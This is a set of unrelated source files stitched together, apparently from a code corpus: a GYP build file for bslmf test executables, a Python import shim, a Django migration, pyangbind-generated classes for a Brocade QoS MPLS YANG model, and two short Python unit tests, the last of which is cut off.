'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isenum.t.cpp' ],
},
{
'target_name': 'bslmf_isfloatingpoint.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isfloatingpoint.t.cpp' ],
},
{
'target_name': 'bslmf_isfunction.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isfunction.t.cpp' ],
},
{
'target_name': 'bslmf_isfundamental.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isfundamental.t.cpp' ],
},
{
'target_name': 'bslmf_isintegral.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isintegral.t.cpp' ],
},
{
'target_name': 'bslmf_islvaluereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_islvaluereference.t.cpp' ],
},
{
'target_name': 'bslmf_ismemberfunctionpointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ismemberfunctionpointer.t.cpp' ],
},
{
'target_name': 'bslmf_ismemberobjectpointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ismemberobjectpointer.t.cpp' ],
},
{
'target_name': 'bslmf_ismemberpointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ismemberpointer.t.cpp' ],
},
{
'target_name': 'bslmf_ispair.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ispair.t.cpp' ],
},
{
'target_name': 'bslmf_ispointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ispointer.t.cpp' ],
},
{
'target_name': 'bslmf_ispointertomember.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ispointertomember.t.cpp' ],
},
{
'target_name': 'bslmf_ispolymorphic.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ispolymorphic.t.cpp' ],
},
{
'target_name': 'bslmf_isreference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isreference.t.cpp' ],
},
{
'target_name': 'bslmf_isrvaluereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isrvaluereference.t.cpp' ],
},
{
'target_name': 'bslmf_issame.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_issame.t.cpp' ],
},
{
'target_name': 'bslmf_istriviallycopyable.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_istriviallycopyable.t.cpp' ],
},
{
'target_name': 'bslmf_istriviallydefaultconstructible.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_istriviallydefaultconstructible.t.cpp' ],
},
{
'target_name': 'bslmf_isvoid.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isvoid.t.cpp' ],
},
{
'target_name': 'bslmf_isvolatile.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isvolatile.t.cpp' ],
},
{
'target_name': 'bslmf_matchanytype.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_matchanytype.t.cpp' ],
},
{
'target_name': 'bslmf_matcharithmetictype.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_matcharithmetictype.t.cpp' ],
},
{
'target_name': 'bslmf_memberfunctionpointertraits.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_memberfunctionpointertraits.t.cpp' ],
},
{
'target_name': 'bslmf_metaint.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_metaint.t.cpp' ],
},
{
'target_name': 'bslmf_nestedtraitdeclaration.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_nestedtraitdeclaration.t.cpp' ],
},
{
'target_name': 'bslmf_nil.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_nil.t.cpp' ],
},
{
'target_name': 'bslmf_removeconst.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removeconst.t.cpp' ],
},
{
'target_name': 'bslmf_removecv.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removecv.t.cpp' ],
},
{
'target_name': 'bslmf_removecvq.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removecvq.t.cpp' ],
},
{
'target_name': 'bslmf_removepointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removepointer.t.cpp' ],
},
{
'target_name': 'bslmf_removereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removereference.t.cpp' ],
},
{
'target_name': 'bslmf_removevolatile.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removevolatile.t.cpp' ],
},
{
'target_name': 'bslmf_selecttrait.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_selecttrait.t.cpp' ],
},
{
'target_name': 'bslmf_switch.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_switch.t.cpp' ],
},
{
'target_name': 'bslmf_tag.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_tag.t.cpp' ],
},
{
'target_name': 'bslmf_typelist.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_typelist.t.cpp' ],
},
],
}
| 25,467 | 10,807 |
# Author Imran Ashraf
# The import syntax changes slightly between python 2 and 3, so we
# need to detect which version is being used:
from sys import version_info

# The import syntax differs between Python 2 and 3, so detect the major
# version of the running interpreter first.
_major = version_info[0]
if _major not in (2, 3):
    raise EnvironmentError("sys.version_info refers to a version of "
                           "Python neither 2 nor 3. This is not permitted. "
                           "sys.version_info = {}".format(version_info))
PY3 = _major == 3

if PY3:
    # Python 3 requires the explicit relative import form.
    from .openql import Program, Kernel
else:
    # Python 2 accepts the implicit (star) import.
    from openql import *
# __all__ = [ init, schedule, compile ]
| 558 | 179 |
# Generated by Django 2.0.9 on 2018-11-17 22:34
import campaigns.models
from django.db import migrations
import sorl.thumbnail.fields
class Migration(migrations.Migration):
    # Auto-generated schema migration: switches Campaign.image to a
    # sorl-thumbnail ImageField that tracks width/height fields and uses
    # campaigns.models.campaign_image_upload_location for uploads.

    dependencies = [
        ('campaigns', '0009_auto_20181116_1943'),
    ]

    operations = [
        migrations.AlterField(
            model_name='campaign',
            name='image',
            field=sorl.thumbnail.fields.ImageField(blank=True, height_field='height_field', null=True, upload_to=campaigns.models.campaign_image_upload_location, width_field='width_field'),
        ),
    ]
| 573 | 201 |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class apply_traffic_class_exp_map_name(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-qos-mpls - based on the path /qos-mpls/map-apply/apply-traffic-class-exp-map-name. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__map_name_cmd2','__all_zero_map_cmd2','__default_map_cmd2','__All_cmd2',)
_yang_name = 'apply-traffic-class-exp-map-name'
_rest_name = 'traffic-class-exp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
    """Initialise the generated container.

    Accepts at most one positional argument: an object carrying the same
    pyangbind elements, whose changed values are copied into this
    instance. Recognised keyword arguments: ``path_helper``,
    ``extmethods`` and ``load``.
    """
    # Path helper resolution: explicit kwarg wins; False disables it;
    # otherwise inherit from the parent node when one exists.
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
        self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
        self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
        path_helper_ = getattr(self._parent, "_path_helper", False)
        self._path_helper = path_helper_
    else:
        self._path_helper = False
    # Extension methods resolve the same way: kwarg, then parent, else off.
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
        self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
        self._extmethods = extmethods
    elif hasattr(self, "_parent"):
        extmethods = getattr(self._parent, "_extmethods", None)
        self._extmethods = extmethods
    else:
        self._extmethods = False
    # Generated leaf wrappers: each private attribute holds a YANGDynClass
    # instance describing one leaf of this container.
    self.__default_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    self.__map_name_cmd2 = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)
    self.__All_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    self.__all_zero_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    load = kwargs.pop("load", None)
    if args:
        # Copy-construction path: exactly one source object is allowed.
        if len(args) > 1:
            raise TypeError("cannot create a YANG container with >1 argument")
        all_attr = True
        for e in self._pyangbind_elements:
            if not hasattr(args[0], e):
                all_attr = False
                break
        if not all_attr:
            raise ValueError("Supplied object did not have the correct attributes")
        # Copy only elements the source marks as changed, via the
        # generated _set_<name> methods.
        for e in self._pyangbind_elements:
            nobj = getattr(args[0], e)
            if nobj._changed() is False:
                continue
            setmethod = getattr(self, "_set_%s" % e)
            if load is None:
                setmethod(getattr(args[0], e))
            else:
                setmethod(getattr(args[0], e), load=load)
def _path(self):
    """Return the schema path of this container as a list of components."""
    # Detached nodes fall back to the absolute path of this container;
    # attached nodes extend their parent's path with their own YANG name.
    if not hasattr(self, "_parent"):
        return [u'qos-mpls', u'map-apply', u'apply-traffic-class-exp-map-name']
    return self._parent._path() + [self._yang_name]
def _rest_path(self):
    """Return the REST path of this container as a list of components."""
    # Detached nodes fall back to the absolute REST path.
    if not hasattr(self, "_parent"):
        return [u'qos-mpls', u'map-apply', u'traffic-class-exp']
    # Nodes with an empty rest name are transparent in REST paths.
    if self._rest_name:
        return self._parent._rest_path() + [self._rest_name]
    return self._parent._rest_path()
def _get_map_name_cmd2(self):
    """Return the current value of the map_name_cmd2 leaf.

    Mapped from the YANG variable
    /qos_mpls/map_apply/apply_traffic_class_exp_map_name/map_name_cmd2
    (map-name-type).
    """
    return self.__map_name_cmd2
def _set_map_name_cmd2(self, v, load=False):
    """
    Setter method for map_name_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/map_name_cmd2 (map-name-type)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_map_name_cmd2 is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_map_name_cmd2() directly.
    """
    # Unwrap values that carry their underlying type converter.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    # Re-wrap the value in the generated leaf type; a failed conversion
    # means the supplied value does not satisfy the YANG restriction.
    try:
        t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """map_name_cmd2 must be of a type compatible with map-name-type""",
            'defined-type': "brocade-apply-qos-mpls:map-name-type",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)""",
        })
    self.__map_name_cmd2 = t
    # Notify the instance-level change hook when one is registered.
    if hasattr(self, '_set'):
        self._set()
  def _unset_map_name_cmd2(self):
    # Reset the leaf to a freshly default-constructed YANGDynClass value.
    self.__map_name_cmd2 = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)
  def _get_all_zero_map_cmd2(self):
    """
    Getter method for all_zero_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/all_zero_map_cmd2 (empty)
    """
    # Return the YANGDynClass-wrapped value of this presence (empty) leaf.
    return self.__all_zero_map_cmd2
  def _set_all_zero_map_cmd2(self, v, load=False):
    """
    Setter method for all_zero_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/all_zero_map_cmd2 (empty)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_all_zero_map_cmd2 is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_all_zero_map_cmd2() directly.
    """
    # Values carrying their own YANG type converter are unwrapped first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    # YANG 'empty' leaves are modelled as booleans (present/absent).
    try:
      t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """all_zero_map_cmd2 must be of a type compatible with empty""",
          'defined-type': "empty",
          'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""",
        })
    self.__all_zero_map_cmd2 = t
    # Notify the parent object, if it supports change notification.
    if hasattr(self, '_set'):
      self._set()
  def _unset_all_zero_map_cmd2(self):
    # Reset the leaf to a freshly default-constructed YANGDynClass value.
    self.__all_zero_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
  def _get_default_map_cmd2(self):
    """
    Getter method for default_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/default_map_cmd2 (empty)
    """
    # Return the YANGDynClass-wrapped value of this presence (empty) leaf.
    return self.__default_map_cmd2
  def _set_default_map_cmd2(self, v, load=False):
    """
    Setter method for default_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/default_map_cmd2 (empty)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_default_map_cmd2 is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_default_map_cmd2() directly.
    """
    # Values carrying their own YANG type converter are unwrapped first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    # YANG 'empty' leaves are modelled as booleans (present/absent).
    try:
      t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """default_map_cmd2 must be of a type compatible with empty""",
          'defined-type': "empty",
          'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""",
        })
    self.__default_map_cmd2 = t
    # Notify the parent object, if it supports change notification.
    if hasattr(self, '_set'):
      self._set()
  def _unset_default_map_cmd2(self):
    # Reset the leaf to a freshly default-constructed YANGDynClass value.
    self.__default_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
  def _get_All_cmd2(self):
    """
    Getter method for All_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/All_cmd2 (empty)
    """
    # Return the YANGDynClass-wrapped value of this presence (empty) leaf.
    return self.__All_cmd2
  def _set_All_cmd2(self, v, load=False):
    """
    Setter method for All_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/All_cmd2 (empty)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_All_cmd2 is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_All_cmd2() directly.
    """
    # Values carrying their own YANG type converter are unwrapped first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    # NOTE: unlike the other leaves above, this one is not part of the
    # 'apply-traffic-class-exp' choice (no choice= argument).
    try:
      t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """All_cmd2 must be of a type compatible with empty""",
          'defined-type': "empty",
          'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""",
        })
    self.__All_cmd2 = t
    # Notify the parent object, if it supports change notification.
    if hasattr(self, '_set'):
      self._set()
  def _unset_All_cmd2(self):
    # Reset the leaf to a freshly default-constructed YANGDynClass value.
    self.__All_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
map_name_cmd2 = __builtin__.property(_get_map_name_cmd2, _set_map_name_cmd2)
all_zero_map_cmd2 = __builtin__.property(_get_all_zero_map_cmd2, _set_all_zero_map_cmd2)
default_map_cmd2 = __builtin__.property(_get_default_map_cmd2, _set_default_map_cmd2)
All_cmd2 = __builtin__.property(_get_All_cmd2, _set_All_cmd2)
__choices__ = {u'apply-traffic-class-exp': {u'ca-map-name-cmd2': [u'map_name_cmd2'], u'ca-default-map-cmd2': [u'default_map_cmd2'], u'ca-all-zero-map-cmd2': [u'all_zero_map_cmd2']}}
_pyangbind_elements = {'map_name_cmd2': map_name_cmd2, 'all_zero_map_cmd2': all_zero_map_cmd2, 'default_map_cmd2': default_map_cmd2, 'All_cmd2': All_cmd2, }
| 16,919 | 6,170 |
import unittest
import dypy
class VariableSupportTest(unittest.TestCase):
    def test_check_variable_id(self):
        """
        Makes sure that when no variable_id is provided, we get the names
        we expect
        :return:
        """
        # Expected sanitized ids when no explicit variable_id is supplied.
        sanitized = {
            "variable_id": "variable_id",
            "Variable_id": "variable_id",
            "Variable ID": "variable_id",
            "5three Variable": "three_variable",
            "Remove-my-hyphens": "remove_my_hyphens",
        }
        # Expected ids when the name itself is passed as the variable_id
        # (capitalization must be kept).
        preserved = {
            "variable_id": "variable_id",
            "Variable_id": "Variable_id",
            "Variable ID": "Variable_ID",
            "5three Variable": "three_Variable",
            "Remove-my-hyphens": "Remove_my_hyphens",
        }
        for raw, expected in sanitized.items():
            self.assertEqual(expected, dypy.variables.check_variable_id(raw, None))
        for raw, expected in preserved.items():
            self.assertEqual(expected, dypy.variables.check_variable_id(raw, raw))
| 904 | 370 |
import unittest
import baseconverter as bctr
class TestOctal(unittest.TestCase):
    """Checks octal-to-decimal conversion and invalid-digit detection."""
    # Kept for backward compatibility; setUp shadows them with fresh
    # instance lists so fixtures no longer accumulate across test runs.
    tests = []
    results = []
    base = 8

    def setUp(self):
        """Build per-test fixtures.

        Fix: the original appended to the class-level lists above, so the
        fixtures grew on every setUp call and leaked between tests.
        """
        self.tests = []
        self.results = []
        converter = bctr.DecimalBaseConverter("7", self.base)
        self.tests.append(converter)
        self.results.append(7)
        converter = bctr.DecimalBaseConverter("10", self.base)
        self.tests.append(converter)
        self.results.append(8)

    def test(self):
        """Valid conversions succeed; digit '8' is rejected in base 8."""
        for conv, result in zip(self.tests, self.results):
            self.assertEqual(conv.convert(), result)
        converter = bctr.DecimalBaseConverter("8", self.base)
